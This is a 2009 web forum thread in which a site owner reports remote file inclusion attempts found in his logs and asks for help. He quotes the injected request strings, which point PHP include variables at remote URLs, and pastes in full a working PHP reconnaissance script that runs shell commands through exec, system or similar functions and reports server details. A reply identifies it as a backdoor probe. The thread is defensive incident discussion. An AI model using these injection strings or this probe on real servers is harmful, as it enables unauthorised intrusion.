Page 1 of 1

php injection script 'fx29id2.txt'

Posted: Tue May 05, 2009 3:17 am
by sak
Hello guys,
As seen in my logs someone is sending me an external php script the following way:
1. PHPLIB[libdir]=http://www.kyokushin.hu/fx29id2.txt
2. index.php?_SERVER%5BDOCUMENT_ROOT%5D=http://www.sunggong.tv/data/shirohige/fxid.txt??

I have opened the php script and basically it test how well my server security is, I guess...
Anyone can supply further info. about this script?
How do I track the sender?

by the way, this is the script:

Code: Select all

 
<?php
##[ Fx29ID ]##
fx("ID","FeeL"."CoMz");
$P   = @getcwd();
$IP  = @getenv("SERVER_ADDR");
$UID = fx29exec("id");
fx("SAFE",@safemode()?"ON":"OFF");
fx("OS",@PHP_OS);
fx("UNAME",@php_uname());
fx("SERVER",($IP)?$IP:"-");
fx("USER",@get_current_user());
fx("UID",($UID)?$UID:"uid=".@getmyuid()." gid=".@getmygid());
fx("DIR",$P);
fx("PERM",(@is_writable($P))?"[W]":"[R]");
fx("HDD","Used: ".hdd("used")." Free: ".hdd("free")." Total: ".hdd("total"));
fx("DISFUNC",@getdisfunc());
##[ FX29SHEXEC ]##
function fx($t,$c) { echo "$t: "; echo (is_array($c))?join(" ",$c):$c; echo "<br>"; }
function safemode() { return (@ini_get("safe_mode") OR eregi("on",@ini_get("safe_mode")) ) ? TRUE : FALSE; }
function getdisfunc() { $rez = explode(",",@ini_get("disable_functions")); return (!empty($rez))?$rez:array(); }
function enabled($func) { return (function_exists($func) && is_callable($func) && !in_array($func,getdisfunc())) ? TRUE : FALSE; }
function fx29exec($cmd) {
  if (enabled("exec")) { exec($cmd,$o); $rez = join("\r\n",$o); }
  elseif (enabled("shell_exec")) { $rez = shell_exec($cmd); }
  elseif (enabled("system")) { @ob_start(); @system($cmd); $rez = @ob_get_contents(); @ob_end_clean(); }  
  elseif (enabled("passthru")) { @ob_start(); passthru($cmd); $rez = @ob_get_contents(); @ob_end_clean(); }
  elseif (enabled("popen") && is_resource($h = popen($cmd.' 2>&1', 'r')) ) { while ( !feof($h) ) { $rez .= fread($h, 2096);  } pclose($h); }
  else { $rez = "Error!"; }
  return $rez;
}
function vsize($size) {
  if (!is_numeric($size)) { return FALSE; }
  else {
    if ( $size >= 1073741824 ) { $size = round($size/1073741824*100)/100 ." GB"; }
    elseif ( $size >= 1048576 ) { $size = round($size/1048576*100)/100 ." MB"; }
    elseif ( $size >= 1024 ) { $size = round($size/1024*100)/100 ." KB"; }
    else { $size = $size . " B"; }
    return $size;
  }
}
function hdd($type) {
  $P = @getcwd(); $T = @disk_total_space($P); $F = @disk_free_space($P); $U = $T - $U;
  $hddspace = array("total" => vsize($T), "free"  => vsize($F), "used"  => vsize($U));
  return $hddspace[$type];
}
die("FeeLCoMz");
?>
 

Re: php injection script 'fx29id2.txt'

Posted: Wed May 06, 2009 7:58 am
by kaisellgren
sak wrote:1. PHPLIB[libdir]=http://www.kyokushin.hu/fx29id2.txt
2. index.php?_SERVER%5BDOCUMENT_ROOT%5D=http://www.sunggong.tv/data/shirohige/fxid.txt??
I'm not sure how he can do that. Even if you have register globals turned on the $_SERVER shouldn't be rewritten.

The script you showed is a backdoor created by the intruder. It seems that he switched your document root server variable to his remote server's address and got an access to your server.

What PHP version are you running? You should definitely turn off Register Globals and upgrade your PHP as it seems that PHP is the one, which is vulnerable here. No matter what settings I try, I cannot reproduce that kind of $_SERVER overwriting on my PHP 5.2.8.

Re: php injection script 'fx29id2.txt'

Posted: Sun May 10, 2009 12:40 am
by sak
Hello kaisellgren and thanks for your help!

Register_Globals is turned off and the PHP version is 5.2.9.
I don't think the one sending the script has really managed to get some info from the company server since it is well-secured, however, I just wanted to know whether it is possible to track down the sender.
Thanks

Re: php injection script 'fx29id2.txt'

Posted: Sun May 10, 2009 6:30 am
by kaisellgren
sak wrote:Hello kaisellgren and thanks for your help!

Register_Globals is turned off and the PHP version is 5.2.9.
I don't think the one sending the script has really managed to get some info from the company server since it is well-secured, however, I just wanted to know whether it is possible to track down the sender.
Thanks
Well you have his domain name, try to track him down from there..